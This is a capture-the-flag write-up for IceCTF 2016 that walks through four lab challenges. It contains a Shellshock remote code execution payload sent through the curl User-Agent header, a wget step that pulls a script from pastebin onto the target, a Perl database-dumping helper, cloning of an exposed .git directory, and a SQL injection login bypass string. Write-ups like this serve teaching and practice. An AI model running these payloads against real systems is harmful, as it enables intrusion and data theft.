IceCTF 2016 More Challs by Birdy42

Demo

So I didn’t know what was the basename fct and didn’t want to spend a lot of time reading the doc.

I updated the original script to print what basename would return.

1
2
3
4
  mkdir /tmp/bi
  cd /tmp/bi
  cp /home/demo/demo.c /tmp/bi
  vi /tmp/bi/demo.c

I added printf of basename and it printed:

1
  demo

So I realized we just had to match the basename to icesh, I created a bash script:

1
2
3
4
  vi /tmp/bi/icesh
 
  #/bin/sh
  /home/demo/demo

Then ran it and got the shell

1
2
  ./tmp/bi/icesh
  cat /home/demo/flag.txt

Exposed

In this example, we realized there was a flaw with the git configuration, since we were able to clone the source files.

To get any repository from the website

1
2
3
4
  mkdir exposed
  git init
  git add remote origin http://exposed.vuln.icec.tf/.git
  git pull origin _hash_

The hash list was in log file:

1
  wget http://exposed.vuln.icec.tf/.git/logs/heads/master

(note: the file is not the same as the cloned one). flag was located in index.php file.

GeoIP

The Team found that we could run RCE with this command:

1
  curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh select \* from 47a6fd2ca39d2b0d6eea1c30008dd889'" http://geocities.vuln.icec.tf/index.cgi

so I used pastebin to charge code in it :

1
wget -P /tmp/bi/ http://pastebin....

used following file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
  #!/usr/bin/perl
  use DBI;
  $my_cmd = "";
  foreach $argnum(0 .. $#ARGV) {
    $my_cmd = $my_cmd . $ARGV[$argnum] . " ";
  }
  print $my_cmd;
  my $dbh = DBI->connect(
      "dbi:mysql:dbname=geocities;host=icectf_mariadb",
      "geocities",
      "geocities",
      { RaiseError => 1 },
  ) or die $DBI::errstr;
  my $sth = $dbh->prepare($my_cmd);
  $sth->execute();
  my $row;
  while ($row = $sth->fetchrow_arrayref()) {
      print "@$row\n";
  }
  $sth->finish();
  $dbh->disconnect();

then could query the db easily using the script and all the arguments of the perl script as the mysql query

1
2
3
4
5
6
7
8
9
  curl -v -H "User-Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo;/bin/bash -c 'perl /tmp/bi/DUbHRGqh sql_query'" http://geocities.vuln.icec.tf/index.cgi

show tables;
  Posts
  47a6fd2ca39d2b0d6eea1c30008dd889

(note that * must be escaped in bash)
Select \* from 47a6fd2ca39d2b0d6eea1c30008dd889;
  IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}

We got the flag !

Miners

This one was really easy, it said you must login but there is not users in the database. The source code showed an obvious SQLI flaw on the username field.

1
2
username :
  asdf' union select 1,2,3 #

I was logged in and had the flag.